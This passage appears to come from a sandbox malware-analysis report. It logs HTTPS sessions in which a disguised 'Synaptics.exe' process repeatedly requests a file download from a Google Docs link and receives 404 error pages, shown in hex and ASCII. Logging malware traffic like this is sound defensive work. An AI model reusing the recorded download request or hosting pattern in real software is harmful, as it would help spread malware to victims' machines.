                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ppBd6BxIdkwF/4JB9CCRVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC387INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC387INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 61 35 70 69 35 2b 49 61 74 56 47 4a 47 35 72 56 50 56 2b 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aa5pi5+IatVGJG5rVPV+xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC389INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC389INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        127192.168.2.349887142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC389OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC389INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uoaaLYFC4XMjS7pGI1dqgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC391INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC391INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 5a 72 70 30 4f 70 73 53 72 39 30 46 4d 34 70 50 33 33 74 34 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TZrp0OpsSr90FM4pP33t4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC392INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC392INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        128192.168.2.349888142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC389OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC392INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hlK1xeZnXXIiSLLV7kUDxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC394INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC394INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 36 58 41 62 53 59 59 45 55 39 70 57 50 62 6c 30 63 4b 75 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e6XAbSYYEU9pWPbl0cKuTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC395INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC395INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        129192.168.2.349889142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC392OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC395INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gqRlxrVetUORroM5ycyxyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC397INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC397INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 47 73 65 4e 77 56 62 71 39 49 76 33 53 42 73 2b 55 54 69 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AGseNwVbq9Iv3SBs+UTi6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC398INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC398INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        13192.168.2.349748142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC37OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC40INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Iuc8SNgF6jAt8go9N6kgtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC42INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 72 45 48 56 2f 38 78 44 46 34 71 57 6d 75 47 41 6d 6d 4f 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rEHV/8xDF4qWmuGAmmOAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:30 UTC43INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC43INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        130192.168.2.349890142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC395OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC398INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-28swOEu2Sqo9jgVe4jGJGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
